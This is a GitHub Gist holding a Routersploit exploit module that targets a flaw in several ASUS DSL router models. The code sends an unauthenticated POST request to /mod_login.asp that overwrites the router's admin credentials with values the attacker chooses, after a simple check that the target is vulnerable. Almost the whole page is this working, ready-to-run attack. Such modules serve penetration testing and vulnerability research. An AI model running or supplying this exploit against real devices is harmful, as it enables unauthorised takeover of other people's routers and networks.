Created
August 14, 2018 18:22
-
-
Save paralax/6847177002ff5d090c249ebc68a8dd4a to your computer and use it in GitHub Desktop.
ASUS Router Password Reset - Routersploit module
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import random | |
import string | |
from routersploit.core.exploit import * | |
from routersploit.core.http.http_client import HTTPClient | |
class Exploit(HTTPClient): | |
__info__ = { | |
"name": "ASUS Router Password Reset", | |
"description": "Module exploits remote flaw in ASUS devices to reset the " | |
"admin password. If the target is vulnerable, it will be " | |
"set to the attacker's chosing.", | |
"authors": ( | |
"@jnazario", # routersploit module | |
), | |
"references": ( | |
"https://www.securityartwork.es/2018/01/25/some-vulnerability-in-asus-routers/", | |
), | |
"devices": ( | |
'DSL-AC51', | |
'DSL-AC52U', | |
'DSL-AC55U', | |
'DSL-N55U C1', | |
'DSL-N55U D1', | |
'DSL-AC56U', | |
'DSL-N10_C1', | |
'DSL-N12U C1', | |
'DSL-N12E C1', | |
'DSL-N14U', | |
'DSL-N14U-B1', | |
'DSL-N16', | |
'DSL-N16U', | |
'DSL-N17U', | |
'DSL-N66U', | |
'DSL-AC750' | |
) | |
} | |
target = OptIP("", "Target IPv4 or IPv6 address") | |
port = OptPort(80, "Target HTTP port") | |
username = OptString("admin", "Account to change") | |
password = OptString("password", "New password password") | |
def run(self): | |
if self.check(): | |
print_success("Target appears to be vulnerable") | |
headers = { | |
"Content-Type": "application/x-www-form-urlencoded", | |
"Referer": self.target+"/Main_Password.asp", | |
} | |
data = {"group_id": "", "action_mode": "apply", | |
"current_page": "Main_Password.asp", | |
"next_page": "/index.asp", "flag": "", | |
"usernamepasswdFlag": "1", | |
"http_username": self.username, | |
"http_passwd": self.password, | |
"foilautofill": ""} | |
response = self.http_request( | |
method='POST', | |
path='/mod_login.asp', | |
headers=headers, | |
data=data | |
) | |
if response is None: | |
print_error("Exploit failed") | |
return '' | |
if response.status_code == 200: | |
return response.text | |
else: | |
print_error("Target is not vulnerable") | |
@mute | |
def check(self): | |
response = self.http_request(method='GET', | |
path='/mod_login.asp') | |
if response is None: | |
return False | |
if response.status_code == 200: | |
return True | |
return False |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
how to reset password?